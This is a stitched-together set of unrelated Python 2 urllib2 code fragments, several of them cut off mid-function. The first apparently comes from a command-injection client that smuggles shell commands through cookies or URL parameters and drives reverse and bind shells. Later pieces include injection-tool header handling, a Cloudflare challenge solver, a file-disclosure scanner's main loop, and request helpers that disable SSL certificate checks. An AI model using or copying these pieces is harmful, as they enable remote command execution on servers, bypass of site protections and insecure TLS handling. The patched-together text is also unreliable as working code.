sc.group(1).split('::command_deli::')[1:-1] else: parameters = urlencode( {self.parameter: self.cmd.strip(';')}) sc = map(str.rstrip, opener.open(self.url, parameters).readlines()) return sc except InvalidURL: exit(errmsg) # except: # exit(fourzerofourmsg) # If the used method set GET else: try: if self.method == 'cookie': opener.addheaders += [ ('Cookie', '{0}={1}'.format( self.parameter, quote('echo ::command_start::;' + self.cmd.rstrip().strip(';') + ';echo ::command_end::;'))), ] sc = map(str.rstrip, opener.open(self.url).readlines()) else: sc = map( str.rstrip, opener.open('{0}{1}'.format( self.url, quote('echo ::command_start::;' + self.cmd.strip(';') + ';echo ::command_end::;'))).readlines()) sc = '::command_deli::'.join(sc) sc = re.search('::command_start::(.*?)::command_end::', sc) if sc: sc = sc.group(1).split('::command_deli::')[1:-1] else: sc = map( str.rstrip, opener.open('{0}{1}'.format( self.url, quote(self.cmd.strip(';')))).readlines()) return sc except InvalidURL: exit(errmsg) except HTTPError: cprint( '[!] This is a 414 error code and you need to work with a POST method', 'red') exit() elif getargs.listen: try: if (listen.socket.sendall(cmd + "\n") != None): errmsg = colored('\n[!] Error in sending data (#1)', 'red') cprint(errmsg, 'red') time.sleep(1) sc = '' buffer = listen.socket.recv(1024) if buffer == '': errmsg = colored('\n[!] Lost connection. 
Exiting...', 'red') cprint(errmsg, 'red') listen.socket.close() exit(1) while buffer != '': sc = sc + buffer # sc +=+ buffer # convert " to ' try: buffer = listen.socket.recv(1024) except: buffer = '' sc = [ i for i in sc.split('\n')[:-1] if not any(s in i for s in [ 'job control in this shell', 'cannot set terminal process group', 'can\'t access tty', '<' ]) ] return sc except: if (listen.socket.sendall(cmd + "\n") != None): errmsg = colored('\n[!] [!] Error in sending data (#2)', 'red') cprint(errmsg, 'red') pass elif getargs.connect: try: if (connect.socket.send(cmd + "\n") == None): errmsg = colored('\n[!] Error in sending data (#1)', 'red') cprint(errmsg, 'red') time.sleep(1) sc = '' buffer = connect.socket.recv(1024) if buffer == '': errmsg = colored('\n[!] Lost connection. Exiting...', 'red') cprint(errmsg, 'red') connect.socket.close() exit(1) while buffer != '': sc = sc + buffer try: buffer = connect.socket.recv(1024) except: buffer = '' return sc.split('\n')[:-1] except: pass else: errmsg = colored('\n[!] Unsupported mode!', 'red') cprint(errmsg, 'red') exit(1)
@param proxy: The HTTP proxy server to use. For example:
    'http://proxy.example.com:3128/'
@param user: The username to authenticate with. Use C{None} to disable
    authentication.
@param password: The password to authenticate with.
"""
import urllib
import urllib2

if proxy is None:
    # Try and find the system proxy settings
    try:
        proxy = urllib.getproxies()['http']
    except KeyError:
        raise ValueError('Could not detect default proxy settings')

# Set up the proxy handler
proxy_handler = urllib2.ProxyHandler({'http': proxy})
opener = urllib2.build_opener(proxy_handler)

if user is not None:
    # Set up basic proxy authentication if provided
    password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
    password_manager.add_password(realm=None, uri=proxy, user=user, passwd=password)
    opener.add_handler(urllib2.ProxyBasicAuthHandler(password_manager))
    opener.add_handler(urllib2.ProxyDigestAuthHandler(password_manager))

# Override the existing url opener
urllib2.install_opener(opener)
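# The snippet above begins mid-docstring, so its def line is missing. A
# hypothetical complete wrapper consistent with the parameters it documents is
# sketched below; the name "set_http_proxy" is an assumption, and the fallback
# to .get() (instead of raising ValueError) is a simplification.
import urllib
import urllib2

def set_http_proxy(proxy=None, user=None, password=None):
    if proxy is None:
        proxy = urllib.getproxies().get('http')  # fall back to system settings
    proxy_handler = urllib2.ProxyHandler({'http': proxy})
    opener = urllib2.build_opener(proxy_handler)
    if user is not None:
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(realm=None, uri=proxy, user=user, passwd=password)
        opener.add_handler(urllib2.ProxyBasicAuthHandler(password_manager))
        opener.add_handler(urllib2.ProxyDigestAuthHandler(password_manager))
    urllib2.install_opener(opener)

# set_http_proxy('http://proxy.example.com:3128/', user='alice', password='s3cret')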
def do_check(request): # Check if defined any Host HTTP header. if menu.options.host and settings.HOST_INJECTION == None: request.add_header(settings.HOST, menu.options.host) # Check if defined any User-Agent HTTP header. if menu.options.agent: request.add_header(settings.USER_AGENT, menu.options.agent) # Check if defined any Referer HTTP header. if menu.options.referer and settings.REFERER_INJECTION == None: request.add_header(settings.REFERER, menu.options.referer) # Check if defined any Cookie HTTP header. if menu.options.cookie and settings.COOKIE_INJECTION == False: request.add_header(settings.COOKIE, menu.options.cookie) if not checks.get_header(request.headers, settings.HTTP_ACCEPT_HEADER): request.add_header(settings.HTTP_ACCEPT_HEADER, settings.HTTP_ACCEPT_HEADER_VALUE) # Appends a fake HTTP header 'X-Forwarded-For' if settings.TAMPER_SCRIPTS["xforwardedfor"]: from src.core.tamper import xforwardedfor xforwardedfor.tamper(request) # Check if defined any HTTP Authentication credentials. # HTTP Authentication: Basic / Digest Access Authentication. if not menu.options.ignore_401: if menu.options.auth_cred and menu.options.auth_type: try: settings.SUPPORTED_HTTP_AUTH_TYPES.index( menu.options.auth_type) if menu.options.auth_type == "basic": b64_string = base64.encodestring( menu.options.auth_cred).replace('\n', '') request.add_header("Authorization", "Basic " + b64_string + "") elif menu.options.auth_type == "digest": try: url = menu.options.url try: response = urllib2.urlopen(url) except urllib2.HTTPError, e: try: authline = e.headers.get( 'www-authenticate', '') authobj = re.match('''(\w*)\s+realm=(.*),''', authline).groups() realm = authobj[1].split(',')[0].replace( "\"", "") user_pass_pair = menu.options.auth_cred.split( ":") username = user_pass_pair[0] password = user_pass_pair[1] authhandler = urllib2.HTTPDigestAuthHandler() authhandler.add_password( realm, url, username, password) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) result = urllib2.urlopen(url) except AttributeError: pass except urllib2.HTTPError, e: pass except ValueError: err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'." err_msg += " Try basic or digest HTTP authentication type." print settings.print_critical_msg(err_msg) raise SystemExit() else: pass # The MIME media type for JSON. if settings.IS_JSON: request.add_header("Content-Type", "application/json") # Check if defined any extra HTTP headers. if menu.options.headers or menu.options.header: # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided. if menu.options.headers: menu.options.headers = checks.wildcard_character( menu.options.headers) extra_headers = menu.options.headers else: menu.options.header = checks.wildcard_character( menu.options.header) extra_headers = menu.options.header extra_headers = extra_headers.replace(":", ": ") if ": //" in extra_headers: extra_headers = extra_headers.replace(": //", "://") if "\\n" in extra_headers: extra_headers = extra_headers.split("\\n") # Remove empty strings extra_headers = [x for x in extra_headers if x] if menu.options.header and not menu.options.headers and len( extra_headers) > 1: warn_msg = "Swithing '--header' to '--headers' " warn_msg += "due to multiple extra HTTP headers." 
print settings.print_warning_msg(warn_msg) else: tmp_extra_header = [] tmp_extra_header.append(extra_headers) extra_headers = tmp_extra_header for extra_header in extra_headers: # Extra HTTP Header name http_header_name = re.findall(r"(.*): ", extra_header) http_header_name = ''.join(http_header_name).strip() # Extra HTTP Header value http_header_value = re.findall(r":(.*)", extra_header) http_header_value = ''.join(http_header_value).strip() # Check if it is a custom header injection. if settings.CUSTOM_HEADER_INJECTION == False and \ settings.INJECT_TAG in http_header_value: settings.CUSTOM_HEADER_INJECTION = True settings.CUSTOM_HEADER_NAME = http_header_name request.add_header(http_header_name, http_header_value)
def get_cookie(self, netloc, ua, timeout): try: headers = {'User-Agent': ua} request = urllib2.Request(netloc) _add_request_header(request, headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile( fileobj=StringIO.StringIO(result)).read() jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0] init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};', result)[-1] builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0] decryptVal = self.parseJSString(init) lines = builder.split(';') for line in lines: if len(line) > 0 and '=' in line: sections = line.split('=') line_val = self.parseJSString(sections[1]) decryptVal = int( eval( str(decryptVal) + sections[0][-1] + str(line_val))) answer = decryptVal + len(urlparse.urlparse(netloc).netloc) query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % ( netloc, jschl, answer) if 'type="hidden" name="pass"' in result: passval = re.findall('name="pass" value="(.*?)"', result)[0] query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % ( netloc, urllib.quote_plus(passval), jschl, answer) time.sleep(6) cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) try: request = urllib2.Request(query) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) except: pass cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) if 'cf_clearance' in cookie: self.cookie = cookie except: pass
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30', ignoreSsl=False, flare=True, ignoreErrors=None): try: if url is None: return None handlers = [] if proxy is not None: handlers += [ urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie' or output == 'extended' or not close is True: cookies = cookielib.LWPCookieJar() handlers += [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)): try: import ssl ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass if url.startswith('//'): url = 'http:' + url try: headers.update(headers) except: headers = {} if 'User-Agent' in headers: pass elif mobile is not True: # headers['User-Agent'] = agent() headers['User-Agent'] = cache.get(randomagent, 1) else: headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in headers: pass elif referer is not None: headers['Referer'] = referer if 'Accept-Language' not in headers: headers['Accept-Language'] = 'en-US' if 'X-Requested-With' in headers: pass elif XHR is True: headers['X-Requested-With'] = 'XMLHttpRequest' if 'Cookie' in headers: pass elif cookie is not None: headers['Cookie'] = cookie if 'Accept-Encoding' in headers: pass elif compression and limit is None: headers['Accept-Encoding'] = 'gzip' if redirect is False: class NoRedirection(urllib2.HTTPErrorProcessor): def http_response(self, request, response): return response opener = urllib2.build_opener(NoRedirection) opener = urllib2.install_opener(opener) try: del headers['Referer'] except: pass if isinstance(post, dict): # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128) for key, value in post.iteritems(): try: post[key] = value.encode('utf-8') except: pass post = urllib.urlencode(post) request = urllib2.Request(url, data=post) _add_request_header(request, headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: try: ignore = ignoreErrors and (int(response.code) == ignoreErrors or int( response.code) in ignoreErrors) except: ignore = False if not ignore: if response.code in [301, 307, 308, 503]: cf_result = response.read(5242880) try: encoding = response.info().getheader( 'Content-Encoding') except: encoding = None if encoding == 'gzip': cf_result = gzip.GzipFile( fileobj=StringIO.StringIO(cf_result)).read() if flare and 'cloudflare' in str(response.info()).lower(): try: from resources.lib.modules import cfscrape if isinstance(post, dict): data = post else: try: data = urlparse.parse_qs(post) except: data = None scraper = cfscrape.CloudflareScraper() response = scraper.request( method='GET' if post is None else 'POST', url=url, headers=headers, data=data, timeout=int(timeout)) result = response.content flare = 'cloudflare' # Used below try: cookies = response.request._cookies except: log_utils.error() except: log_utils.error() elif 'cf-browser-verification' in cf_result: netloc = '%s://%s' % 
(urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = headers['User-Agent'] cf = cache.get(cfcookie().get, 168, netloc, ua, timeout) headers['Cookie'] = cf request = urllib2.Request(url, data=post) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) else: log_utils.log( 'Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error is False: return else: log_utils.log( 'Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error is False: return if output == 'cookie': try: result = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass if close is True: response.close() return result elif output == 'geturl': result = response.geturl() if close is True: response.close() return result elif output == 'headers': result = response.headers if close is True: response.close() return result elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if content < (2048 * 1024): return result = response.read(16 * 1024) if close is True: response.close() return result if flare != 'cloudflare': if limit == '0': result = response.read(224 * 1024) elif limit is not None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'sucuri_cloudproxy_js' in result: su = sucuri().get(result) headers['Cookie'] = su request = urllib2.Request(url, data=post) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) if limit == '0': result = response.read(224 * 1024) elif limit is not None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile( fileobj=StringIO.StringIO(result)).read() if 'Blazingfast.io' in result and 'xhr.open' in result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = headers['User-Agent'] headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout) result = _basic_request(url, headers=headers, post=post, timeout=timeout, limit=limit) if output == 'extended': try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()]) except: response_headers = response.headers try: response_code = str(response.code) except: response_code = str(response.status_code ) # object from CFScrape Requests object. try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass if close is True: response.close() return (result, response_code, response_headers, headers, cookie) else: if close is True: response.close() return result except Exception as e: log_utils.error() log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG) return
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, limit=None, referer=None, cookie=None, output='', timeout='30'): try: #control.log('@@@@@@@@@@@@@@ - URL:%s' % url) handlers = [] if not proxy == None: handlers += [ urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie2' or output == 'cookie' or output == 'extended' or not close == True: cookies = cookielib.LWPCookieJar() handlers += [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) try: if sys.version_info < (2, 7, 9): raise Exception() import ssl ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass try: headers.update(headers) except: headers = {} if 'User-Agent' in headers: pass elif not mobile == True: #headers['User-Agent'] = agent() headers['User-Agent'] = cache.get(randomagent, 1) else: headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in headers: pass elif referer == None: headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) else: headers['Referer'] = referer if not 'Accept-Language' in headers: headers['Accept-Language'] = 'en-US' if 'Cookie' in headers: pass elif not cookie == None: headers['Cookie'] = cookie if redirect == False: class NoRedirection(urllib2.HTTPErrorProcessor): def http_response(self, request, response): return response opener = urllib2.build_opener(NoRedirection) opener = urllib2.install_opener(opener) try: del headers['Referer'] except: pass request = urllib2.Request(url, data=post, headers=headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: control.log("AAAA- CODE %s|%s " % (url, response.code)) if response.code == 503: if 'cf-browser-verification' in response.read(5242880): control.log("CF-OK") netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) cf = cache.get(cfcookie, 168, netloc, headers['User-Agent'], timeout) headers['Cookie'] = cf request = urllib2.Request(url, data=post, headers=headers) response = urllib2.urlopen(request, timeout=int(timeout)) elif error == False: return elif response.code == 307: control.log("AAAA- Location: %s" % (response.headers['Location'].rstrip())) cookie = '' try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass headers['Cookie'] = cookie request = urllib2.Request(response.headers['Location'], data=post, headers=headers) response = urllib2.urlopen(request, timeout=int(timeout)) #control.log("AAAA- BBBBBBB %s" % response.code) elif error == False: print("Response code", response.code, response.msg, url) return if output == 'cookie': try: result = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass elif output == 'response': if limit == '0': result = (str(response.code), response.read(224 * 1024)) elif not limit == None: result = (str(response.code), response.read(int(limit) * 1024)) else: result = (str(response.code), response.read(5242880)) elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if 
content < (2048 * 1024): return result = response.read(16 * 1024) elif output == 'extended': try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass content = response.headers result = response.read(5242880) return (result, headers, content, cookie) elif output == 'geturl': result = response.geturl() elif output == 'headers': content = response.headers return content else: if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) if close == True: response.close() return result except Exception as e: control.log('Client ERR %s, url:' % (e, url)) return
'''
response = urllib2.urlopen('http://www.baidu.com')
print response.getcode()
cont = response.read()
'''

url = 'http://www.baidu.com'
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0')
response = urllib2.urlopen(request)
print response.getcode()
cont = response.read()

'''
url = "http://www.baid.com"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen(url)
print response.getcode()
cont = response.read()
'''

try:
    f = os.open('index.html', os.O_CREAT | os.O_RDWR)
    os.write(f, cont)
except:
def download_file(self):
    logger.info("Direct download")
    headers = []

    # Make sure the file can be created
    logger.info("nombrefichero=" + self.file_name)
    self.file_name = xbmc.makeLegalFilename(self.file_name)
    logger.info("nombrefichero=" + self.file_name)
    logger.info("url=" + self.url)

    # Create the file
    existSize = 0
    f = open(self.file_name, 'wb')
    grabado = 0

    # Parse headers embedded in the URL, XBMC-style
    if "|" in self.url:
        additional_headers = self.url.split("|")[1]
        if "&" in additional_headers:
            additional_headers = additional_headers.split("&")
        else:
            additional_headers = [additional_headers]
        for additional_header in additional_headers:
            logger.info("additional_header: " + additional_header)
            name = re.findall("(.*?)=.*?", additional_header)[0]
            value = urllib.unquote_plus(re.findall(".*?=(.*?)$", additional_header)[0])
            headers.append([name, value])
        self.url = self.url.split("|")[0]
        logger.info("url=" + self.url)

    # Socket timeout: 60 seconds
    socket.setdefaulttimeout(60)

    # Build the request and add the headers
    h = urllib2.HTTPHandler(debuglevel=0)
    request = urllib2.Request(self.url)
    for header in headers:
        logger.info("Header=" + header[0] + ": " + header[1])
        request.add_header(header[0], header[1])

    # Send the request
    opener = urllib2.build_opener(h)
    urllib2.install_opener(opener)
    try:
        connexion = opener.open(request)
    except urllib2.HTTPError, e:
        logger.error("error %d (%s) al abrir la url %s" % (e.code, e.msg, self.url))
        # print e.code
        # print e.msg
        # print e.hdrs
        # print e.fp
        f.close()
        # Error 416 means the requested range is beyond the end of the file,
        # i.e. the download is already complete
        if e.code == 416:
            return 0
        else:
            return -2
def main(): """ Initializes and executes the program """ global args kb.files = [] kb.found = False kb.print_lock = threading.Lock() kb.value_lock = threading.Lock() kb.versioned_locations = {} check_revision() print(BANNER) args = parse_args() if args.update: update() exit() with open("versions.ini") as f: section = None for line in f.xreadlines(): line = line.strip() if re.match(r"\[.+\]", line): section = line.strip("[]") elif line: if section not in kb.versioned_locations: kb.versioned_locations[section] = [] kb.versioned_locations[section].append(line) cases = get_cases(args) if not args.list_file else load_list( args.list_file) if not cases: print("[!] No available test cases with the specified attributes.\n" "[!] Please verify available options with --list.") exit() if args.list: args.list = args.list.lower() _ = ("category", "software", "os") if args.list not in _: print("[!] Valid values for option '--list' are: %s" % ", ".join(_)) exit() print("[i] Listing available filters for usage with option '--%s':\n" % args.list) try: for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) except KeyError: pass finally: exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: match = re.search( r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) else: from thirdparty.socks import socks if match.group("type").upper() == PROXY_TYPE.SOCKS4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == PROXY_TYPE.SOCKS5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) else: print( "[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\")." ) exit() if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] kb.parsed_target_url = urlsplit(args.url) kb.request_params = args.data if args.data else kb.parsed_target_url.query if not args.param: match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params) if match: args.param = match.group("param") else: found = False for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)", kb.request_params): found = True print("[x] Parameter with empty value found ('%s')." % match.group("param")) if found: print( "[!] Please always use non-empty (valid) parameter values." ) print("[!] No usable GET/POST parameters found.") exit() if args.os: kb.restrict_os = args.os print("[i] Starting scan at: %s\n" % time.strftime("%X")) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data kb.original_response = get_page(**request_args) if not kb.original_response: print("[!] Something seems to be wrong with connection settings.") if not args.verbose: print("[i] Please rerun with switch '-v'.") exit() print("[i] Checking invalid response...") request_args = prepare_request( "%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix)) kb.invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") if args.threads > 1: print("[i] Starting %d threads." 
% args.threads) threads = [] for i in xrange(args.threads): thread = threading.Thread( target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)], )) thread.daemon = True thread.start() threads.append(thread) alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) if not kb.found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in kb.files: print("[o] %s" % _) print(" \n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30'): try: if not url: return handlers = [] if not proxy == None: handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie' or output == 'extended' or not close == True: cookies = cookielib.LWPCookieJar() handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if (2, 7, 8) < sys.version_info < (2, 7, 12): try: import ssl; ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass if url.startswith('//'): url = 'http:' + url _headers ={} try: _headers.update(headers) except: pass if 'User-Agent' in _headers: pass elif not mobile == True: #headers['User-Agent'] = agent() _headers['User-Agent'] = cache.get(randomagent, 1) else: _headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in _headers: pass elif referer is not None: _headers['Referer'] = referer if not 'Accept-Language' in _headers: _headers['Accept-Language'] = 'en-US' if 'X-Requested-With' in _headers: pass elif XHR == True: _headers['X-Requested-With'] = 'XMLHttpRequest' if 'Cookie' in _headers: pass elif not cookie == None: _headers['Cookie'] = cookie if 'Accept-Encoding' in _headers: pass elif compression and limit is None: _headers['Accept-Encoding'] = 'gzip' if redirect == False: #old implementation #class NoRedirection(urllib2.HTTPErrorProcessor): # def http_response(self, request, response): return response #opener = urllib2.build_opener(NoRedirection) #opener = urllib2.install_opener(opener) class NoRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): infourl = urllib.addinfourl(fp, headers, req.get_full_url()) infourl.status = code infourl.code = code return infourl http_error_300 = http_error_302 http_error_301 = http_error_302 http_error_303 = http_error_302 http_error_307 = http_error_302 opener = urllib2.build_opener(NoRedirectHandler()) urllib2.install_opener(opener) try: del _headers['Referer'] except: pass if isinstance(post, dict): post = utils.byteify(post) post = urllib.urlencode(post) url = utils.byteify(url) request = urllib2.Request(url, data=post) _add_request_header(request, _headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: if response.code == 503: cf_result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': cf_result = gzip.GzipFile(fileobj=StringIO.StringIO(cf_result)).read() if 'cf-browser-verification' in cf_result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) if not netloc.endswith('/'): netloc += '/' ua = _headers['User-Agent'] cf = cache.get(cfcookie().get, 168, netloc, ua, timeout) _headers['Cookie'] = cf request = urllib2.Request(url, data=post) _add_request_header(request, _headers) response = urllib2.urlopen(request, timeout=int(timeout)) else: log_utils.log('Request-Error (%s): %s' % (str(response.code), url), 
log_utils.LOGDEBUG) if error == False: return else: log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error == False: return if output == 'cookie': try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass if close == True: response.close() return result elif output == 'geturl': result = response.geturl() if close == True: response.close() return result elif output == 'headers': result = response.headers if close == True: response.close() return result elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if content < (2048 * 1024): return result = response.read(16 * 1024) if close == True: response.close() return result elif output == 'file_size': try: content = int(response.headers['Content-Length']) except: content = '0' response.close() return content if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'sucuri_cloudproxy_js' in result: su = sucuri().get(result) _headers['Cookie'] = su request = urllib2.Request(url, data=post) _add_request_header(request, _headers) response = urllib2.urlopen(request, timeout=int(timeout)) if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'Blazingfast.io' in result and 'xhr.open' in result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = _headers['User-Agent'] _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout) result = _basic_request(url, headers=_headers, post=post, timeout=timeout, limit=limit) if output == 'extended': try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()]) except: response_headers = response.headers response_code = str(response.code) try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass if close == True: response.close() return (result, response_code, response_headers, _headers, cookie) else: if close == True: response.close() return result except Exception as e: log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG) return
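The redirect=False branch of request() above swaps in a redirect handler that hands back the 3xx response instead of following its Location header, and gzip bodies are decoded by hand later on. A stripped-down sketch of those two pieces in isolation, assuming a plain GET with no cookies or Cloudflare handling (fetch_no_redirect is an illustrative name):

import gzip
import urllib
import urllib2
from StringIO import StringIO

class NoRedirectHandler(urllib2.HTTPRedirectHandler):
    # return the 3xx response itself instead of following it
    def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
    http_error_300 = http_error_302
    http_error_301 = http_error_302
    http_error_303 = http_error_302
    http_error_307 = http_error_302

def fetch_no_redirect(url, timeout=30):
    opener = urllib2.build_opener(NoRedirectHandler())
    response = opener.open(url, timeout=timeout)
    data = response.read()
    # decode gzip transparently, mirroring the Content-Encoding check above
    if response.info().get('Content-Encoding') == 'gzip':
        data = gzip.GzipFile(fileobj=StringIO(data)).read()
    return response.code, data

Using opener.open() directly keeps the no-redirect behaviour scoped to this call, whereas install_opener(), as used throughout this file, changes it process-wide.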
